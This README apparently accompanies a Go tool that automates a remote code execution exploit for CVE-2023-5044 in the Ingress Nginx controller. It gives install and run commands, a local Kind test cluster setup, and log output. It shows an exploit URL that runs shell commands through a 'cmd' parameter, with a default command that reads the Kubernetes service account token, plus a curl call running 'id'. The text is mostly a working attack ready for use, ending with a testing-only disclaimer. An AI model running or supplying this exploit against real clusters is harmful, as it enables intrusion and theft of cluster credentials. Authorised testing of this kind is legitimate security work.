This is a quick Go program to exploit the recent CVE in the Ingress Nginx controller.

Details on how to do this are already out there via Rory McCune's blog at https://raesene.github.io/blog/2023/10/29/exploiting-CVE-2023-5044/, this just automates the process a little and tidies up the exploit so that it is a more flexible, generic remote code execution payload.

% go install github.com/4armed/cve-2023-5044@latest

You will need a cluster to run it against, running a vulnerable version of ingress-nginx (obvs). If you don't have one you're testing against, you can create a Kind cluster by cloning this repo and using the Makefile in the deploy folder.

% git clone github.com/4armed/cve-2023-5044
% cd cve-2023-5044/deploy && make up

If you leave the kind.yaml file as-is you'll have a cluster bound to your localhost on port 30080 and 30443.

% cve-2023-5044 run -u http://localhost:30080
2024/01/17 14:10:48 INFO checking permissions
2024/01/17 14:10:48 INFO created ingress object namespace=default name=forearmed-poc-hm48l
2024/01/17 14:10:48 INFO exploit at http://localhost:30080/4armed?cmd=cat+%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken"

The "checking permissions" line is because the tool does a Subject Access Review to check you have permissions to create an ingress. If you don't it will exit at that point. If you have edit access to an existing ingress you can certainly use the exploit to achieve a compromise but it's far too complex to automate the updating of an existing ingress without breaking stuff.

The default path to trigger the exploit is /4armed and it reads and executes the value of the cmd query string parameter.

It will print out an example URL with the default command cat /var/run/secrets/kubernetes.io/serviceaccount/token. You can change this with the -e flag or just supply a different value in the cmd parameter. The exploit isn't hard-coded. You don't need to deploy a new ingress.

%  curl 'http://localhost:30080/4armed?cmd=id'
uid=101(www-data) gid=82(www-data)

The ingress object name is randomised using GenerateName so pay attention to the output and clean up after yourself.

% kubectl delete ingress forearmed-poc-hm48l
ingress.networking.k8s.io "forearmed-poc-hm48l" deleted

If you just want to generate the ingress object use:

% cve-2023-5044 generate

This is for testing purposes only against a cluster for which you have authorisation. If you use it against a cluster, whether you have permission or not, the author does not accept any responsibility for any damage or issues caused. Every care has been take to choose path values which don't conflict with existing ones, you can override these with flags or change the code if needed, but you still might break something. Make sure you know what you are doing.